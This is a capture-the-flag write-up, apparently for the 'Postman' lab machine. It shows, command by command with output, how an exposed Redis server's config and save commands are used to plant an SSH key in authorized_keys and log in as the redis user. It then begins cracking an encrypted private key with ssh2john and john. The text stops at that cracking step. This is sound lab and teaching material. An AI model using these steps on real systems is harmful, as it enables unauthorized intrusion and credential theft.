System Information

Initial Enumeration

Nmap scan show some services available:

Port 10000 is usually allocated and used by Webmin, a well-known web abblication where users can manage a Linux system
Port 6379 is used by redis server, an in-memory data store, that can be used as database, cache or messagebroker

My first check was to look for known vulnerabilities of webmin (there has been some in the past) but it seemed not vulnerable to any RCE or other remote vulnerability.
I also tried some bruteforcing of accounts but with no .result

Initial foothold

So my focus turned on redis.

According to an article of the author (http://antirez.com/news/96 and https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html), there is no security model in redis server.

It's up to the administrator to put security measures upstream (i.e. not exposing it to untrusted users, etc..)

The articles also explain (in an obfuscated way) how to leverage some features/commands to write files into the server filesystem.

The next step for exploitation is understanding and trying to use the same commands (maybe in different order).

First is to find the home folder of redis process: in Debian (and derivative distro) redis server is running as redis user and its home folder is /var/lib/redis

So the exploitation we can try is to write an SSH key of our choice in /var/lib/redis/.ssh/ with the filename authorized_keys

We can create an SSH key pair and put the public part in key.txt, while the private parte can be put in id_rsa

Next we can connect to redis with the client:

# redis-cli -h 10.10.10.160

10.10.10.160:6379> config set dir "/var/lib/redis/.ssh"

1) "dir"

2) "/var/lib/redis/.ssh"

(0.70s)

10.10.10.160:6379> config set dbfilename "authorized_keys"

(0.51s)

10.10.10.160:6379> save

(1.04s)

10.10.10.160:6379>

The commands given above configure redis server such that the database is the file /var/lib/redis/.ssh/authorized_keys

Then we can pass the public key to redis server that will save it in the "database"

# cat key.txt | redis-cli -h 10.10.10.160 -x set attack3

# redis-cli -h 10.10.10.160 save

After this commands we should be able to logon the server using the private part of the key:

# ssh -i id_rsa redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

* Canonical Livepatch is available for installation.

- Reduce system reboots and improve kernel security. Activate at:

https://ubuntu.com/livepatch

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Nov 5 09:15:54 2019 from 10.10.15.223

redis@Postman:~$ uptime

09:17:14 up 2 min, 2 users, load average: 19.64, 8.00, 2.99

redis@Postman:~$ id

uid=107(redis) gid=114(redis) groups=114(redis)

And we are in the system as redis.

This foothold will disappear in a short time if someone else will exploit it the same way by overwriting out SSH public key, or if someone resets the box (the filesystem will return to a clean state).

User flag

The next step is to enumerate to find a way to escalate to another use... Many ways (LinEnum, find, etc..).

We can find an RSA private key in /opt/id_rsa.bak

Unfortuantely we can't use it directly because it's encrypted but there is tool names ssh2john.py that convert the key to a format that john the ripper can crack

When we have this key converted we can crack it with rockyou wordlist: